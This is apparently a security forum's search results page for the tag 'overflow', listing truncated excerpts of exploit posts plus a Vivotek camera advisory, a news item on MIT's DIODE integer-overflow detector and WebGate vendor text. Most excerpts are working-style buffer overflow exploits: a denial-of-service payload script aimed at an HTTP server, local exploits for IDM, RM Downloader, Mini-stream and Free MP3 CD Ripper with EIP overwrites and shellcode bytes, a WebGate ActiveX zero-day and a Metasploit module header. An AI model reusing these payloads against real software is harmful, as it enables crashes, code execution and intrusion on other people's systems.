Search the Community
Showing results for tags 'overflow'.
Found 12 results
-
Many Vivotek IP cameras suffer from a remote stack overflow vulnerability. Device models include CC8160, CC8370, CC8371, CD8371, FD8166A, FD8166A, FD8166A-N, FD8167A, FD8167A, FD8167AS, FD8167AS, FD8169A, FD8169A, FD8169A, FD8169AS, FD8169AS, FD816B, FD816B, FD816BA, FD816BA, FD816C, FD816C, FD816CA, FD816CA, FD816D, FD8177, FD8179, FD8182, FD8182, FD8182-F1, FD8365A_v2, FD8367A, FD8367A, FD8369A, FD8369A, FD836B, FD836BA, FD836D, FD8377, FD8379, FD8382, FD9171, FD9181, FD9371, FD9381, FE8174_v2, FE8181_v2, FE8182, FE8374_v2, FE8381_v2, FE9181, FE9182, FE9381, FE9382, IB8367A, IB8369A, IB836B,
-
- 1
-
-
- vivotek ip
- remote
- (and 3 more)
-
# Exploit Title: Son HTTP HServer stack buffer overflow # Date: 2015 June # Author: sleed - [URL="http://www.rstforums.com"]Romanian Security Team - Homepage[/URL] & Pwnthecode.org # Version: 0.9 # Tested on: Windows 8 # # Description: A simple bof denial of service in Son HTTP HServer # # import socket import struct payload = "\x42\x41\x43" * 80392 payload += "\x81\xc4\xf0\xea\xff\xff" + "B" * 70330 payload += "\x0r" + "C" * 110030 print "[+] sending payload: ", len(payload) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.0.100", 80)) buf = ( "GET /" -
#!/usr/bin/python ########################################################################################### #Exploit Title:iFTP 2.21 Buffer OverFlow Crash PoC #Author: dogo h@ck #Date Discovered : 12-5-2015 #Vendor Homepage: http://www.memecode.com/iftp.php #Software Link: http://www.memecode.com/data/iftp-win32-v2.21.exe #Version: 2.21 #Tested on : Windows XP Sp3 ########################################################################################### #Crash : Go to Connect > Host Address > Post it #Bad Characters (\x00\x09\x0a\x0d\x80 and all from \x80 To \xFF I know It's FU&
-
<html> <title>WebGate WinRDS WESPPlayback.WESPPlaybackCtrl.1 StopSiteAllChannel Stack Buffer Overflow Vulnerability (0Day)</title> <!-- # Exploit Title: WebGate WinRDS StopSiteAllChannel Stack Overflow SEH Overwrite (0Day) # Google Dork: [if relevant] (we will automatically add these to the GHDB) # Date: 27th March, 2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36 #
-
#!/usr/bin/env python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: IDM v6.20 Local Buffer Overflow #[+] Date: 27-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: https://www.internetdownloadmanager.com/ #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Poc:http://i.imgur.com/7et4xSh.png #[+] Create IDMLBOF.txt then open , copy the content then go to Options-VPN/Dial Up and paste it in the username field. from struct import pack file="IDMLBOF.txt" junk="\x41"*2313 eip = pack('<I',0x7C9D30D7) nops = "\x90" * 3 shellcode = ("\xdb\xc0\x31\xc9\xbf
-
tudents from M.I.T. have devised a new and more efficient way to scour raw code for integer overflows, the troublesome programming bugs that serve as a popular exploit vector for attackers and often lead to the crashing of systems. Researchers from the school’s Computer Science and Artificial Intelligence Laboratory (CSAIL) last week debuted the platform dubbed DIODE, short for Directed Integer Overflow Detection. As part of an experiment, the researchers tested DIODE on code from five different open source applications. While the system was able to generate inputs that triggered three integer
-
#!/usr/bin/env python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: RM Downloader v2.7.5.400 Local Buffer Overflow #[+] Date: 25-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Related Vulnerability/ies: # http://www.exploit-db.com/exploits/8628/ #POC: #IMG1: #http://i.imgur.com/87sXIj8.png from struct import pack fi
-
#!/usr/bin/env python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: Mini-sream Ripper v2.7.7.100 Local Buffer Overflow #[+] Date: 25-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/43/Mini-streamRipper.exe?token=1427334864_8d9c5d7d948871f54ae14ed9304d1ddf&fileName=Mini-streamRipper.exe #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Original POC: # http://www.exploit-db.com/exploits/11197/ #POC: #IMG1: #http://i.imgur.com/ifXYgwx.png #IMG2: #http://i.imgur.com/ZMisj6R.png from struct i
-
#!/usr/bin/env python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: Mini-sream RM-MP3 Converter v2.7.3.700 Local Buffer Overflow #[+] Date: 25-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Related Vulnerability/ies: # Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow #POC: #IMG1: #http://i.imgur.com/ESt0
-
#!/usr/bin/python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: Free MP3 CD Ripper All versions Local Buffer Overflow #[+] Date: 20-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R from struct import pack file="evilfile.wav" junk="\x41"*4112 eip = pack('<I',0x7C9D30D7) nops = "\x90" * 3 #Calc.exe Shellcode #POC:http://youtu.be/_uvHKonqO2g shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'Publish-It PUI Buffer Overflow (SEH)', 'Description' => %q{ This module exploits a stack based buffer overflow in Publish-It when processing a specially crafted .PUI file. This vulnerability could be exploited by a remo
-
Webgate technology is focused on digital image processing, embedded system design and networking to produce embedded O/S and web server cameras providing real time images. We are also making superior network stand-alone DVRs by applying our accumulated network and video solution knowledge. WEBGATE Embedded Standard Protocol (WESP) SDK supports same tools in both network DVR and network camera. Webgate Inc. Business Partners: Honeywell, Samsung Techwin, Bosch, Pentax Technology, Fujitsu AOS Technology, inc http://www.webgateinc.com/wgi/eng/#2 http://www.webgateinc.com/wgi_htdocs/eng/sdk_info
.thumb.jpg.29b1f7ae7dd9ad5a11e41a710722ba35.jpg)